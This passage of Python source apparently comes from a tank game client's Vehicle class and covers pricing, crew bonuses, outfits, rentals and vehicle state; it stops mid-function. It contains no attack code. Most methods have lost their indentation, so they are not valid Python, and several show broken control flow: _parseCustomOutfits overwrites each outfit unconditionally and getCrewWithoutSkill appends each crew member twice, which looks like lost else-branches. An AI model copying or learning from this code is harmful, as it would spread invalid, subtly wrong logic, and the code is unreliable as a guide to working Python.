def _calcDefaultSellPrice(self, proxy):
if self.isRented:
return MONEY_UNDEFINED
price = self.sellPrices.itemPrice.defPrice
defaultDevices, installedDevices, _ = self.descriptor.getDevices()
for defCompDescr, instCompDescr in izip(defaultDevices, installedDevices):
if defCompDescr == instCompDescr:
continue
modulePrice = FittingItem(defCompDescr, proxy).sellPrices.itemPrice.defPrice
price = price - modulePrice
modulePrice = FittingItem(instCompDescr, proxy).sellPrices.itemPrice.defPrice
price = price + modulePrice
return price
    def _calcCrewBonuses(self, crew, proxy):
        """Compute crew skill-level bonuses from equipment, devices and tankmen.

        crew is a list of tankman inventory IDs (None for empty slots).
        Returns a dict with 'equipment', 'optDevices', 'commander' and
        'brotherhood' bonus components.
        """
        bonuses = dict()
        # Crew-level increase granted by consumables and battle boosters.
        bonuses['equipment'] = 0.0
        for eq in self.equipment.regularConsumables.getInstalledItems():
            bonuses['equipment'] += eq.crewLevelIncrease
        for battleBooster in self.equipment.battleBoosterConsumables.getInstalledItems():
            bonuses['equipment'] += battleBooster.getCrewBonus(self)
        bonuses['optDevices'] = self.descriptor.miscAttrs['crewLevelIncrease']
        bonuses['commander'] = 0
        commanderEffRoleLevel = 0
        # Brotherhood applies only if EVERY slot is filled and every tankman has
        # the skill fully trained; any violation below zeroes it out.
        bonuses['brotherhood'] = tankmen.getSkillsConfig().getSkill('brotherhood').crewLevelIncrease
        for tankmanID in crew:
            if tankmanID is None:
                bonuses['brotherhood'] = 0.0
                continue
            tmanInvData = proxy.inventory.getItems(GUI_ITEM_TYPE.TANKMAN, tankmanID)
            if not tmanInvData:
                continue
            tdescr = tankmen.TankmanDescr(compactDescr=tmanInvData['compDescr'])
            if 'brotherhood' not in tdescr.skills or tdescr.skills.index('brotherhood') == len(tdescr.skills) - 1 and tdescr.lastSkillLevel != tankmen.MAX_SKILL_LEVEL:
                bonuses['brotherhood'] = 0.0
            if tdescr.role == Tankman.ROLES.COMMANDER:
                # Effective commander level on THIS vehicle (penalties/bonuses applied).
                factor, addition = tdescr.efficiencyOnVehicle(self.descriptor)
                commanderEffRoleLevel = round(tdescr.roleLevel * factor + addition)
        # The commander shares a fraction of his effective level with the crew.
        bonuses['commander'] += round((commanderEffRoleLevel + bonuses['brotherhood'] + bonuses['equipment']) / tankmen.COMMANDER_ADDITION_RATIO)
        return bonuses
def _buildCrew(self, crew, proxy):
crewItems = list()
crewRoles = self.descriptor.type.crewRoles
for idx, tankmanID in enumerate(crew):
tankman = None
if tankmanID is not None:
tmanInvData = proxy.inventory.getItems(GUI_ITEM_TYPE.TANKMAN, tankmanID)
tankman = self.itemsFactory.createTankman(strCompactDescr=tmanInvData['compDescr'], inventoryID=tankmanID, vehicle=self, proxy=proxy)
crewItems.append((idx, tankman))
return _sortCrew(crewItems, crewRoles)
@staticmethod
def __crewSort(t1, t2):
return 0 if t1 is None or t2 is None else t1.__cmp__(t2)
    def _parseCompDescr(self, compactDescr):
        # Vehicles use their own compact-descriptor layout: extract nation and
        # in-nation IDs and tag the item type explicitly as VEHICLE.
        nId, innID = vehicles.parseVehicleCompactDescr(compactDescr)
        return (GUI_ITEM_TYPE.VEHICLE, nId, innID)
    def _parseShells(self, layoutList, defaultLayoutList, proxy):
        """Build Shell items from the stored layout merged with the gun's shot list.

        layoutList and defaultLayoutList are flat [intCD, count, ...] sequences;
        the default layout additionally flags shells bought for credits.
        """
        shellsDict = dict(((cd, count) for cd, count, _ in LayoutIterator(layoutList)))
        defaultsDict = dict(((cd, (count, isBoughtForCredits)) for cd, count, isBoughtForCredits in LayoutIterator(defaultLayoutList)))
        layoutList = list(layoutList)
        # Make sure every shell type the current gun can fire appears, even with
        # a zero count, so the GUI can offer it.
        for shot in self.descriptor.gun.shots:
            cd = shot.shell.compactDescr
            if cd not in shellsDict:
                layoutList.extend([cd, 0])
        result = list()
        for intCD, count, _ in LayoutIterator(layoutList):
            defaultCount, isBoughtForCredits = defaultsDict.get(intCD, (0, False))
            result.append(self.itemsFactory.createShell(intCD, count, defaultCount, proxy, isBoughtForCredits))
        return result
@classmethod
def _parseCustomOutfits(cls, compactDescr, proxy):
outfits = {}
for season in SeasonType.SEASONS:
outfitData = proxy.inventory.getOutfitData(compactDescr, season)
if outfitData:
outfits[season] = cls.itemsFactory.createOutfit(outfitData.compDescr, bool(outfitData.flags & StyleFlags.ENABLED), bool(outfitData.flags & StyleFlags.INSTALLED), proxy)
outfits[season] = cls.itemsFactory.createOutfit()
return outfits
    @classmethod
    def _parseStyledOutfits(cls, compactDescr, proxy):
        """Expand an applied style (season ALL) into per-season outfit items.

        Returns an empty dict when no style is applied or it is not enabled.
        """
        outfits = {}
        outfitData = proxy.inventory.getOutfitData(compactDescr, SeasonType.ALL)
        if not outfitData or not bool(outfitData.flags & StyleFlags.ENABLED):
            return outfits
        # Resolve the style item referenced by the stored outfit component.
        component = customizations.parseCompDescr(outfitData.compDescr)
        styleIntCD = vehicles.makeIntCompactDescrByID('customizationItem', CustomizationType.STYLE, component.styleId)
        style = vehicles.getItemByCompactDescr(styleIntCD)
        # A style bundles one outfit per season; materialize each as a GUI item.
        for styleSeason in SeasonType.SEASONS:
            compDescr = style.outfits.get(styleSeason).makeCompDescr()
            outfits[styleSeason] = cls.itemsFactory.createOutfit(compDescr, bool(outfitData.flags & StyleFlags.ENABLED), bool(outfitData.flags & StyleFlags.INSTALLED), proxy)
        return outfits
@classmethod
def _parserOptDevs(cls, layoutList, proxy):
result = list()
for i in xrange(len(layoutList)):
optDevDescr = layoutList[i]
result.append(cls.itemsFactory.createOptionalDevice(optDevDescr.compactDescr, proxy) if optDevDescr is not None else None)
return result
    @property
    def iconContour(self):
        # Path to the contour (silhouette) icon for this vehicle name.
        return getContourIconPath(self.name)

    @property
    def iconUnique(self):
        # Path to the "unique vehicle" icon without the lightning overlay.
        return getUniqueIconPath(self.name, withLightning=False)

    @property
    def iconUniqueLight(self):
        # Path to the "unique vehicle" icon with the lightning overlay.
        return getUniqueIconPath(self.name, withLightning=True)

    @property
    def shellsLayoutIdx(self):
        # Key identifying the (turret, gun) pair a shells layout belongs to.
        return (self.turret.descriptor.compactDescr, self.gun.descriptor.compactDescr)
    @property
    def invID(self):
        # Inventory slot ID (-1 when the vehicle is not in the inventory).
        return self._inventoryID

    @property
    def xp(self):
        # Accumulated vehicle experience.
        return self._xp

    @property
    def dailyXPFactor(self):
        # Daily first-win XP multiplier; -1 when not applicable.
        return self._dailyXPFactor

    @property
    def isElite(self):
        return self._isElite

    @property
    def isFullyElite(self):
        # Elite AND every researchable item already unlocked.
        return self._isFullyElite

    @property
    def clanLock(self):
        # Clan lock expiry timestamp (0 when not locked).
        return self._clanLock

    @property
    def isUnique(self):
        return self._isUnique

    @property
    def rentPackages(self):
        # Available rent packages computed by calcRentPackages().
        return self._rentPackages

    @property
    def hasRentPackages(self):
        return self._hasRentPackages

    @property
    def isDisabledForBuy(self):
        return self._isDisabledForBuy

    @property
    def isSelected(self):
        return self._isSelected

    @property
    def restorePrice(self):
        # Price to restore a sold vehicle; None when proxy data was unavailable.
        return self._restorePrice

    @property
    def canTradeIn(self):
        return self._canTradeIn

    @property
    def canTradeOff(self):
        return self._canTradeOff

    @property
    def tradeOffPriceFactor(self):
        return self._tradeOffPriceFactor

    @property
    def tradeOffPrice(self):
        return self._tradeOffPrice

    @property
    def rotationGroupNum(self):
        # Rotation group number (0 when the vehicle is not in a rotation group).
        return self._rotationGroupNum

    @property
    def rotationBattlesLeft(self):
        return self._rotationBattlesLeft

    @property
    def isRotationGroupLocked(self):
        return self._isRotationGroupLocked

    @property
    def isInfiniteRotationGroup(self):
        return self._isInfiniteRotationGroup

    @property
    def settings(self):
        # Bit flags from inventory 'settings' (see VEHICLE_SETTINGS_FLAG).
        return self._settings

    @settings.setter
    def settings(self, value):
        self._settings = value

    @property
    def lock(self):
        # (lockReason, lockExpiryTime) pair from inventory data.
        return self._lock

    @property
    def repairCost(self):
        return self._repairCost

    @property
    def health(self):
        return self._health
    # Installed module items; setters allow fitting previews to swap modules.
    @property
    def gun(self):
        return self._gun

    @gun.setter
    def gun(self, value):
        self._gun = value

    @property
    def turret(self):
        return self._turret

    @turret.setter
    def turret(self, value):
        self._turret = value

    @property
    def engine(self):
        return self._engine

    @engine.setter
    def engine(self, value):
        self._engine = value

    @property
    def chassis(self):
        return self._chassis

    @chassis.setter
    def chassis(self, value):
        self._chassis = value

    @property
    def radio(self):
        return self._radio

    @radio.setter
    def radio(self, value):
        self._radio = value

    @property
    def fuelTank(self):
        return self._fuelTank

    @fuelTank.setter
    def fuelTank(self, value):
        self._fuelTank = value

    @property
    def optDevices(self):
        return self._optDevices

    @property
    def shells(self):
        return self._shells

    @property
    def equipment(self):
        return self._equipment

    @property
    def equipmentLayout(self):
        return self._equipmentLayout

    @property
    def modules(self):
        # Fixed order: chassis, turret (None if no real turret), gun, engine, radio.
        return (self.chassis,
         self.turret if self.hasTurrets else None,
         self.gun,
         self.engine,
         self.radio)
    @property
    def bonuses(self):
        # Crew bonus components computed by _calcCrewBonuses().
        return self._bonuses

    @property
    def crewIndices(self):
        # Maps tankman inventory ID -> crew slot index.
        return self._crewIndices

    @property
    def crew(self):
        # List of (slotIdx, Tankman-or-None) pairs sorted by role.
        return self._crew

    @crew.setter
    def crew(self, value):
        self._crew = value

    @property
    def lastCrew(self):
        # Crew composition recorded before the current one (inventory 'lastCrew').
        return self._lastCrew

    @property
    def hasModulesToSelect(self):
        return self._hasModulesToSelect

    @property
    def isRentable(self):
        # Rent packages exist and the vehicle has not been bought outright.
        return self.hasRentPackages and not self.isPurchased

    @property
    def isPurchased(self):
        # Owned permanently, i.e. in inventory and not under an active rent.
        return self.isInInventory and not self.rentInfo.isRented
    def isPreviewAllowed(self):
        # Hangar preview is offered only for non-owned, non-secret vehicles.
        return not self.isInInventory and not self.isSecret

    @property
    def rentExpiryTime(self):
        return self.rentInfo.rentExpiryTime

    @property
    def rentCompensation(self):
        # Money compensated for remaining rent when buying the vehicle.
        return self.rentInfo.compensations

    @property
    def isRentAvailable(self):
        # More rent can be bought while the cap (maxRentDuration) leaves room
        # for at least the shortest package.
        return self.maxRentDuration - self.rentLeftTime >= self.minRentDuration

    @property
    def minRentPrice(self):
        minRentPackage = self.getRentPackage()
        return minRentPackage.get('rentPrice', MONEY_UNDEFINED) if minRentPackage is not None else MONEY_UNDEFINED

    @property
    def isRented(self):
        return self.rentInfo.isRented

    @property
    def rentLeftTime(self):
        return self.rentInfo.getTimeLeft()

    @property
    def maxRentDuration(self):
        # Longest package times MAX_RENT_MULTIPLIER, in seconds; 0 with no packages.
        return max((item['days'] for item in self.rentPackages)) * self.MAX_RENT_MULTIPLIER * time_utils.ONE_DAY if self.rentPackages else 0

    @property
    def minRentDuration(self):
        # Shortest package duration in seconds; 0 with no packages.
        return min((item['days'] for item in self.rentPackages)) * time_utils.ONE_DAY if self.rentPackages else 0

    @property
    def rentalIsOver(self):
        # Rent expired and the vehicle is no longer marked as selected.
        return self.isRented and self.rentExpiryState and not self.isSelected

    @property
    def rentalIsActive(self):
        return self.isRented and not self.rentExpiryState

    @property
    def rentLeftBattles(self):
        return self.rentInfo.battlesLeft

    @property
    def rentExpiryState(self):
        return self.rentInfo.getExpiryState()

    @property
    def descriptor(self):
        # Underlying items.vehicles.VehicleDescr for this vehicle.
        return self.__descriptor
    @property
    def type(self):
        # The single vehicle-class tag (e.g. 'heavyTank') from the type's tags.
        return set(vehicles.VEHICLE_CLASS_TAGS & self.tags).pop()

    @property
    def typeUserName(self):
        return getTypeUserName(self.type, self.isElite)

    @property
    def hasTurrets(self):
        # True when at least one turret is real (not a lobby "fake" turret).
        vDescr = self.descriptor
        return len(vDescr.hull.fakeTurrets['lobby']) != len(vDescr.turrets)

    @property
    def hasBattleTurrets(self):
        # Same check but against the battle fake-turret list.
        vDescr = self.descriptor
        return len(vDescr.hull.fakeTurrets['battle']) != len(vDescr.turrets)
    @property
    def ammoMaxSize(self):
        return self.descriptor.gun.maxAmmo

    @property
    def isAmmoFull(self):
        # "Full enough": loaded shells reach at least 20% of max ammo capacity
        # (NOT_FULL_AMMO_MULTIPLIER).
        return sum((s.count for s in self.shells)) >= self.ammoMaxSize * self.NOT_FULL_AMMO_MULTIPLIER

    @property
    def hasShells(self):
        return sum((s.count for s in self.shells)) > 0

    @property
    def hasCrew(self):
        # At least one crew slot is occupied.
        return findFirst(lambda x: x[1] is not None, self.crew) is not None

    @property
    def hasEquipments(self):
        return findFirst(None, self.equipment.regularConsumables) is not None

    @property
    def hasOptionalDevices(self):
        return findFirst(None, self.optDevices) is not None
@property
def modelState(self):
if self.health < 0:
return Vehicle.VEHICLE_STATE.EXPLODED
return Vehicle.VEHICLE_STATE.DESTROYED if self.repairCost > 0 and self.health == 0 else Vehicle.VEHICLE_STATE.UNDAMAGED
def getState(self, isCurrnentPlayer=True):
ms = self.modelState
if not self.isInInventory and isCurrnentPlayer:
ms = Vehicle.VEHICLE_STATE.NOT_PRESENT
if self.isInBattle:
ms = Vehicle.VEHICLE_STATE.BATTLE
elif self.rentalIsOver:
ms = Vehicle.VEHICLE_STATE.RENTAL_IS_OVER
if self.isPremiumIGR:
ms = Vehicle.VEHICLE_STATE.IGR_RENTAL_IS_OVER
elif self.isTelecom:
ms = Vehicle.VEHICLE_STATE.DEAL_IS_OVER
elif self.isDisabledInPremIGR:
ms = Vehicle.VEHICLE_STATE.IN_PREMIUM_IGR_ONLY
elif self.isInPrebattle:
ms = Vehicle.VEHICLE_STATE.IN_PREBATTLE
elif self.isLocked:
ms = Vehicle.VEHICLE_STATE.LOCKED
elif self.isDisabledInRoaming:
ms = Vehicle.VEHICLE_STATE.SERVER_RESTRICTION
elif self.isRotationGroupLocked:
ms = Vehicle.VEHICLE_STATE.ROTATION_GROUP_LOCKED
ms = self.__checkUndamagedState(ms, isCurrnentPlayer)
if ms in Vehicle.CAN_SELL_STATES and self.__customState:
ms = self.__customState
return (ms, self.__getStateLevel(ms))
def setCustomState(self, state):
self.__customState = state
def getCustomState(self):
return self.__customState
def clearCustomState(self):
self.__customState = ''
def isCustomStateSet(self):
return self.__customState != ''
def __checkUndamagedState(self, state, isCurrnentPlayer=True):
if state == Vehicle.VEHICLE_STATE.UNDAMAGED and isCurrnentPlayer:
if self.isBroken:
return Vehicle.VEHICLE_STATE.DAMAGED
if not self.isCrewFull:
return Vehicle.VEHICLE_STATE.CREW_NOT_FULL
if not self.isAmmoFull:
return Vehicle.VEHICLE_STATE.AMMO_NOT_FULL
if not self.isRotationGroupLocked and self.rotationGroupNum != 0:
return Vehicle.VEHICLE_STATE.ROTATION_GROUP_UNLOCKED
return state
@classmethod
def __getEventVehicles(cls):
return cls.eventsCache.getEventVehicles()
def isRotationApplied(self):
return self.rotationGroupNum != 0
def isGroupReady(self):
return (True, '')
def __getStateLevel(self, state):
if state in (Vehicle.VEHICLE_STATE.CREW_NOT_FULL,
Vehicle.VEHICLE_STATE.DAMAGED,
Vehicle.VEHICLE_STATE.EXPLODED,
Vehicle.VEHICLE_STATE.DESTROYED,
Vehicle.VEHICLE_STATE.SERVER_RESTRICTION,
Vehicle.VEHICLE_STATE.RENTAL_IS_OVER,
Vehicle.VEHICLE_STATE.IGR_RENTAL_IS_OVER,
Vehicle.VEHICLE_STATE.AMMO_NOT_FULL_EVENTS,
Vehicle.VEHICLE_STATE.UNSUITABLE_TO_QUEUE,
Vehicle.VEHICLE_STATE.DEAL_IS_OVER,
Vehicle.VEHICLE_STATE.UNSUITABLE_TO_UNIT,
Vehicle.VEHICLE_STATE.ROTATION_GROUP_LOCKED):
return Vehicle.VEHICLE_STATE_LEVEL.CRITICAL
return Vehicle.VEHICLE_STATE_LEVEL.INFO if state in (Vehicle.VEHICLE_STATE.UNDAMAGED, Vehicle.VEHICLE_STATE.ROTATION_GROUP_UNLOCKED) else Vehicle.VEHICLE_STATE_LEVEL.WARNING
@property
def isPremium(self):
return checkForTags(self.tags, VEHICLE_TAGS.PREMIUM)
@property
def isPremiumIGR(self):
return checkForTags(self.tags, VEHICLE_TAGS.PREMIUM_IGR)
@property
def isSecret(self):
return checkForTags(self.tags, VEHICLE_TAGS.SECRET)
@property
def isSpecial(self):
return checkForTags(self.tags, VEHICLE_TAGS.SPECIAL)
@property
def isExcludedFromSandbox(self):
return checkForTags(self.tags, VEHICLE_TAGS.EXCLUDED_FROM_SANDBOX)
@property
def isObserver(self):
return checkForTags(self.tags, VEHICLE_TAGS.OBSERVER)
@property
def isEvent(self):
return self.isOnlyForEventBattles and self in Vehicle.__getEventVehicles()
@property
def isDisabledInRoaming(self):
return checkForTags(self.tags, VEHICLE_TAGS.DISABLED_IN_ROAMING) and self.lobbyContext.getServerSettings().roaming.isInRoaming()
@property
def canNotBeSold(self):
return checkForTags(self.tags, VEHICLE_TAGS.CANNOT_BE_SOLD)
@property
def isUnrecoverable(self):
return checkForTags(self.tags, VEHICLE_TAGS.UNRECOVERABLE)
@property
def isCrewLocked(self):
return checkForTags(self.tags, VEHICLE_TAGS.CREW_LOCKED)
@property
def isOutfitLocked(self):
return checkForTags(self.tags, VEHICLE_TAGS.OUTFIT_LOCKED)
@property
def isDisabledInPremIGR(self):
return self.isPremiumIGR and self.igrCtrl.getRoomType() != constants.IGR_TYPE.PREMIUM
@property
def name(self):
return self.descriptor.type.name
@property
def userName(self):
return getUserName(self.descriptor.type)
@property
def longUserName(self):
typeInfo = getTypeInfoByName('vehicle')
tagsDump = [ typeInfo['tags'][tag]['userString'] for tag in self.tags if typeInfo['tags'][tag]['userString'] != '' ]
return '%s %s' % (''.join(tagsDump), getUserName(self.descriptor.type))
@property
def shortUserName(self):
return getShortUserName(self.descriptor.type)
@property
def level(self):
return self.descriptor.type.level
@property
def fullDescription(self):
return self.descriptor.type.description if self.descriptor.type.description.find('_descr') == -1 else ''
@property
def tags(self):
return self.descriptor.type.tags
@property
def rotationGroupIdx(self):
return self.rotationGroupNum - 1
@property
def canSell(self):
if not self.isInInventory:
return False
st, _ = self.getState()
if self.isRented:
if not self.rentalIsOver:
return False
if st in (self.VEHICLE_STATE.RENTAL_IS_OVER, self.VEHICLE_STATE.IGR_RENTAL_IS_OVER):
st = self.__checkUndamagedState(self.modelState)
return st in self.CAN_SELL_STATES and not checkForTags(self.tags, VEHICLE_TAGS.CANNOT_BE_SOLD)
@property
def isLocked(self):
return self.lock[0] != LOCK_REASON.NONE
@property
def isInBattle(self):
return self.lock[0] == LOCK_REASON.ON_ARENA
@property
def isInPrebattle(self):
return self.lock[0] in (LOCK_REASON.PREBATTLE, LOCK_REASON.UNIT)
@property
def isAwaitingBattle(self):
return self.lock[0] == LOCK_REASON.IN_QUEUE
@property
def isInUnit(self):
return self.lock[0] == LOCK_REASON.UNIT
@property
def typeOfLockingArena(self):
return None if not self.isLocked else self.lock[1]
@property
def isBroken(self):
return self.repairCost > 0
@property
def isAlive(self):
return not self.isBroken and not self.isLocked
@property
def isCrewFull(self):
crew = [ tman for _, tman in self.crew ]
return None not in crew and len(crew)
@property
def isOnlyForEventBattles(self):
return checkForTags(self.tags, VEHICLE_TAGS.EVENT)
@property
def isTelecom(self):
return checkForTags(self.tags, VEHICLE_TAGS.TELECOM)
@property
def isTelecomDealOver(self):
return self.isTelecom and self.rentExpiryState
def hasLockMode(self):
isBS = prb_getters.isBattleSession()
if isBS:
isBSVehicleLockMode = bool(prb_getters.getPrebattleSettings()[PREBATTLE_SETTING_NAME.VEHICLE_LOCK_MODE])
if isBSVehicleLockMode and self.clanLock > 0:
return True
return False
def isReadyToPrebattle(self, checkForRent=True):
if checkForRent and self.rentalIsOver:
return False
if not self.isGroupReady()[0]:
return False
result = not self.hasLockMode()
if result:
result = not self.isBroken and self.isCrewFull and not self.isDisabledInPremIGR and not self.isInBattle and not self.isRotationGroupLocked
return result
@property
def isReadyToFight(self):
if self.rentalIsOver:
return False
if not self.isGroupReady()[0]:
return False
result = not self.hasLockMode()
if result:
result = self.isAlive and self.isCrewFull and not self.isDisabledInRoaming and not self.isDisabledInPremIGR and not self.isRotationGroupLocked
return result
@property
def isXPToTman(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.XP_TO_TMAN)
@property
def isAutoRepair(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_REPAIR)
@property
def isAutoLoad(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_LOAD)
@property
def isAutoEquip(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_EQUIP)
def isAutoBattleBoosterEquip(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_EQUIP_BOOSTER)
@property
def isFavorite(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.GROUP_0)
@property
def isAutoRentStyle(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_RENT_CUSTOMIZATION)
def isAutoLoadFull(self):
if self.isAutoLoad:
for shell in self.shells:
if shell.count != shell.defaultCount:
return False
return True
def isAutoEquipFull(self):
return self.equipment.regularConsumables == self.equipmentLayout.regularConsumables if self.isAutoEquip else True
def mayPurchase(self, money):
if self.isOnlyForEventBattles:
return (False, 'isDisabledForBuy')
if self.isDisabledForBuy:
return (False, 'isDisabledForBuy')
return (False, 'premiumIGR') if self.isPremiumIGR else super(Vehicle, self).mayPurchase(money)
def mayRent(self, money):
if getattr(BigWorld.player(), 'isLongDisconnectedFromCenter', False):
return (False, GUI_ITEM_ECONOMY_CODE.CENTER_UNAVAILABLE)
if self.isDisabledForBuy and not self.isRentable:
return (False, GUI_ITEM_ECONOMY_CODE.RENTAL_DISABLED)
if self.isRentable and not self.isRentAvailable:
return (False, GUI_ITEM_ECONOMY_CODE.RENTAL_TIME_EXCEEDED)
minRentPrice = self.minRentPrice
return self._isEnoughMoney(minRentPrice, money) if minRentPrice else (False, GUI_ITEM_ECONOMY_CODE.NO_RENT_PRICE)
def mayRestore(self, money):
if getattr(BigWorld.player(), 'isLongDisconnectedFromCenter', False):
return (False, GUI_ITEM_ECONOMY_CODE.CENTER_UNAVAILABLE)
return (False, GUI_ITEM_ECONOMY_CODE.RESTORE_DISABLED) if not self.isRestoreAvailable() or constants.IS_CHINA and self.rentalIsActive else self._isEnoughMoney(self.restorePrice, money)
def mayRestoreWithExchange(self, money, exchangeRate):
mayRestore, reason = self.mayRestore(money)
if mayRestore:
return mayRestore
if reason == GUI_ITEM_ECONOMY_CODE.NOT_ENOUGH_CREDITS and money.isSet(Currency.GOLD):
money = money.exchange(Currency.GOLD, Currency.CREDITS, exchangeRate, default=0)
mayRestore, reason = self._isEnoughMoney(self.restorePrice, money)
return mayRestore
return False
def getRentPackage(self, days=None):
if days is not None:
for package in self.rentPackages:
if package.get('days', None) == days:
return package
elif self.rentPackages:
return min(self.rentPackages, key=itemgetter('rentPrice'))
return
def getGUIEmblemID(self):
return self.icon
def getRentPackageActionPrc(self, days=None):
package = self.getRentPackage(days)
return getActionPrc(package['rentPrice'], package['defaultRentPrice']) if package else 0
def getAutoUnlockedItems(self):
return self.descriptor.type.autounlockedItems[:]
def getAutoUnlockedItemsMap(self):
return dict(((vehicles.getItemByCompactDescr(nodeCD).itemTypeName, nodeCD) for nodeCD in self.descriptor.type.autounlockedItems))
def getUnlocksDescrs(self):
for unlockIdx, data in enumerate(self.descriptor.type.unlocksDescrs):
yield (unlockIdx,
data[0],
data[1],
set(data[2:]))
def getUnlocksDescr(self, unlockIdx):
try:
data = self.descriptor.type.unlocksDescrs[unlockIdx]
except IndexError:
data = (0, 0, set())
return (data[0], data[1], set(data[2:]))
def getPerfectCrew(self):
return self.getCrewBySkillLevels(100)
def getCrewWithoutSkill(self, skillName):
crewItems = list()
crewRoles = self.descriptor.type.crewRoles
for slotIdx, tman in self.crew:
if tman and skillName in tman.skillsMap:
tmanDescr = tman.descriptor
skills = tmanDescr.skills[:]
if tmanDescr.skillLevel(skillName) < tankmen.MAX_SKILL_LEVEL:
lastSkillLevel = tankmen.MAX_SKILL_LEVEL
else:
lastSkillLevel = tmanDescr.lastSkillLevel
skills.remove(skillName)
unskilledTman = self.itemsFactory.createTankman(tankmen.generateCompactDescr(tmanDescr.getPassport(), tmanDescr.vehicleTypeID, tmanDescr.role, tmanDescr.roleLevel, skills, lastSkillLevel), vehicle=self)
crewItems.append((slotIdx, unskilledTman))
crewItems.append((slotIdx, tman))
return _sortCrew(crewItems, crewRoles)
def getCrewBySkillLevels(self, defRoleLevel, skillsByIdxs=None, levelByIdxs=None, nativeVehsByIdxs=None):
skillsByIdxs = skillsByIdxs or {}
levelByIdxs = levelByIdxs or {}
nativeVehsByIdxs = nativeVehsByIdxs or {}
crewItems = list()
crewRoles = self.descriptor.type.crewRoles
for idx, _ in enumerate(crewRoles):
defRoleLevel = levelByIdxs.get(idx, defRoleLevel)
if defRoleLevel is not None:
role = self.descriptor.type.crewRoles[idx][0]
nativeVehicle = nativeVehsByIdxs.get(idx)
if nativeVehicle is not None:
nationID, vehicleTypeID = nativeVehicle.descriptor.type.id
else:
nationID, vehicleTypeID = self.descriptor.type.id
tankman = self.itemsFactory.createTankman(tankmen.generateCompactDescr(tankmen.generatePassport(nationID), vehicleTypeID, role, defRoleLevel, skillsByIdxs.get(idx, [])), vehicle=self)
else:
tankman = None
crewItems.append((idx, tankman))
return _sortCrew(crewItems, crewRoles)
def getOutfit(self, season):
for outfit in (self._styledOutfits.get(season), self._customOutfits.get(season)):
if outfit and outfit.isActive():
return outfit
outfit = Outfit(isEnabled=True, isInstalled=True)
return outfit
def setCustomOutfit(self, season, outfit):
self._customOutfits[season] = outfit
def setOutfits(self, fromVehicle):
for season in SeasonType.SEASONS:
self._customOutfits[season] = fromVehicle.getCustomOutfit(season)
self._styledOutfits[season] = fromVehicle.getStyledOutfit(season)
def getCustomOutfit(self, season):
return self._customOutfits.get(season)
def getStyledOutfit(self, season):
return self._styledOutfits.get(season)
def hasOutfit(self, season):
outfit = self.getOutfit(season)
return outfit is not None
def hasOutfitWithItems(self, season):
outfit = self.getOutfit(season)
return outfit is not None and not outfit.isEmpty()
def getBonusCamo(self):
for season in SeasonType.SEASONS:
outfit = self.getOutfit(season)
if not outfit:
continue
camo = outfit.hull.slotFor(GUI_ITEM_TYPE.CAMOUFLAGE).getItem()
if camo:
return camo
return None
def getAnyOutfitSeason(self):
activeSeasons = []
for season in SeasonType.SEASONS:
if self.hasOutfitWithItems(season):
activeSeasons.append(season)
return random.choice(activeSeasons) if activeSeasons else SeasonType.SUMMER
def isRestorePossible(self):
return self.restoreInfo.isRestorePossible() if not self.isPurchased and not self.isUnrecoverable and self.lobbyContext.getServerSettings().isVehicleRestoreEnabled() and self.restoreInfo is not None else False
def isRestoreAvailable(self):
return self.isRestorePossible() and not self.restoreInfo.isInCooldown()
def hasLimitedRestore(self):
return self.isRestorePossible() and self.restoreInfo.isLimited() and self.restoreInfo.getRestoreTimeLeft() > 0
def hasRestoreCooldown(self):
return self.isRestorePossible() and self.restoreInfo.isInCooldown()
def isRecentlyRestored(self):
return self.isPurchased and self.restoreInfo.isInCooldown() if self.restoreInfo is not None else False
def __cmp__(self, other):
if self.isRestorePossible() and not other.isRestorePossible():
return -1
if not self.isRestorePossible() and other.isRestorePossible():
return 1
return cmp(other.hasLimitedRestore(), self.hasLimitedRestore()) or cmp(self.restoreInfo.getRestoreTimeLeft(), other.restoreInfo.getRestoreTimeLeft()) if self.isRestorePossible() and other.isRestorePossible() else super(Vehicle, self).__cmp__(other)
def __eq__(self, other):
return False if other is None else self.descriptor.type.id == other.descriptor.type.id
def __repr__(self):
return 'Vehicle<id:%d, intCD:%d, nation:%d, lock:%s>' % (self.invID,
self.intCD,
self.nationID,
self.lock)
def _mayPurchase(self, price, money):
return (False, GUI_ITEM_ECONOMY_CODE.CENTER_UNAVAILABLE) if getattr(BigWorld.player(), 'isLongDisconnectedFromCenter', False) else super(Vehicle, self)._mayPurchase(price, money)
def _getShortInfo(self, vehicle=None, expanded=False):
description = i18n.makeString('#menu:descriptions/' + self.itemTypeName)
caliber = self.descriptor.gun.shots[0].shell.caliber
armor = findVehicleArmorMinMax(self.descriptor)
return description % {'weight': BigWorld.wg_getNiceNumberFormat(float(self.descriptor.physics['weight']) / 1000),
'hullArmor': BigWorld.wg_getIntegralFormat(armor[1]),
'caliber': BigWorld.wg_getIntegralFormat(caliber)}
def _sortByType(self, other):
return compareByVehTypeName(self.type, other.type)
def __hasModulesToSelect(self):
components = []
for moduleCD in self.descriptor.type.installableComponents:
moduleType = getTypeOfCompactDescr(moduleCD)
if moduleType == GUI_ITEM_TYPE.FUEL_TANK:
continue
if moduleType in components:
return True
components.append(moduleType)
return False
def getTypeUserName(vehType, isElite):
return i18n.makeString('#menu:header/vehicleType/elite/%s' % vehType) if isElite else i18n.makeString('#menu:header/vehicleType/%s' % vehType)
def getTypeShortUserName(vehType):
return i18n.makeString('#menu:classes/short/%s' % vehType)
def _getLevelIconName(vehLevel, postfix=''):
return 'tank_level_%s%d.png' % (postfix, int(vehLevel))
def getLevelBigIconPath(vehLevel):
return '../maps/icons/levels/%s' % _getLevelIconName(vehLevel, 'big_')
def getLevelSmallIconPath(vehLevel):
return '../maps/icons/levels/%s' % _getLevelIconName(vehLevel, 'small_')
def getLevelIconPath(vehLevel):
return '../maps/icons/levels/%s' % _getLevelIconName(vehLevel)
def getIconPath(vehicleName):
return '../maps/icons/vehicle/%s' % getItemIconName(vehicleName)
def getContourIconPath(vehicleName):
return '../maps/icons/vehicle/contour/%s' % getItemIconName(vehicleName)
def getSmallIconPath(vehicleName):
return '../maps/icons/vehicle/small/%s' % getItemIconName(vehicleName)
def getUniqueIconPath(vehicleName, withLightning=False):
